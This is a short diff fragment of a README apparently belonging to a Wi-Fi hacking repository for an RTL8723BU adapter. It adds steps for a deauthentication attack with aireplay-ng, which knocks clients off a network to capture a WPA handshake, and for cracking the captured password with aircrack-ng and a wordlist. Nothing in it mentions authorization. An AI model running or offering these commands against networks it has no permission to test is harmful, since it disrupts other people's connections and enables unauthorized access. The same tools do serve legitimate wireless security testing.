rehan5039/Wifi-hacking-rtl8723bu/README.md

 ```
 Replace `[channel]`, `[BSSID]`, and `[filename]` with the appropriate values.

+#### 4. Deauthentication Attack
+   To capture a handshake, deauthenticate a connected device:
 ```bash
 aireplay-ng --deauth 10 -a [BSSID] wlan0
 ```
+#### 5. Crack the Password
+   Once you have captured a handshake, use `aircrack-ng` to try and crack the password:
 ```bash
 aircrack-ng capture.cap -w [wordlist]
 ```
+Replace `[wordlist]` with a path to a wordlist file.

 You should see "Mode:Monitor" next to your wireless interface.